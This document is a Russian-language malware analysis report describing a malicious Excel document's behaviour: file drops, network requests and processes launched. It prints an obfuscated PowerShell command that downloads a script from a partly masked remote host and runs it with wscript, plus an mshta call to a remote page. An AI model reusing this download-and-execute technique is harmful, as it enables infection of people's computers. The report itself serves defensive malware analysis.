Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://ad####doseng.com/MARCOSVIADO'',$env:temp+''\\''+''central.js'')'|D; start-p...
- '<SYSTEM32>\wscript.exe' "%TEMP%\central.js"
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{c897ee99-248c-484e-900b-af535a252de2}.tmp
- %TEMP%\central.js
- %HOMEPATH%\central.js
Сетевая активность
TCP
Запросы HTTP GET
- http://ad####doseng.com/goigoi.html
- http://ad####doseng.com/MARCOSVIADO
Запросы HTTP POST
- http://20#######imadeles.ddns.net:7974/Vre via 20######cimadeles.ddns.net
UDP
- DNS ASK ad####doseng.com
- DNS ASK 20######cimadeles.ddns.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%TEMP%\central.js"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://ad####doseng.com/MARCOSVIADO'',$env:temp+''\\''+''central.js'')'|D; start-p...' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' http://ad####doseng.com/goigoi.html' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\mshta.exe' http://ad####doseng.com/goigoi.html
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
